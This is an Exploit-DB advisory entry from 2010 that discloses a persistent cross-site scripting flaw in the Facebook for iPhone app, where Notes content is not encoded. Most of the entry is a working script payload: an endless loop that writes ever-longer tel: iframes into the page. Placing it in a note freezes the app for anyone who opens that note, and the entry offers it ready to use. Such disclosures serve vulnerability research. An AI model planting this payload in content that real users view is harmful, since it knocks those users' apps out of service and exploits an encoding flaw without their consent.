Facebook for iPhone persistent XSS DoS

2010-01-03T00:00:00
ID EDB-ID:10947
Type exploitdb
Reporter marco_
Modified 2010-01-03T00:00:00

Description

Facebook for iPhone persistent XSS DOS. Dos exploit for hardware platform

                                        
                                            Facebook for iPhone persistent XSS

Facebook application for iPhone is not encoding special characters in Notes detail

Adding this code in a note will freeze application:
<script>var x = 'x'; while (1) { document.write('<iframe src="tel:'+x+'"></iframe>'); x = x + 'x'; }</script>

App page: http://www.facebook.com/apps/application.php?id=6628568379
Download: http://phobos.apple.com/WebObjects/MZStore.woa/wa/viewSoftware?id=284882215&mt=8

marco_ <marcojetson@gmail.com>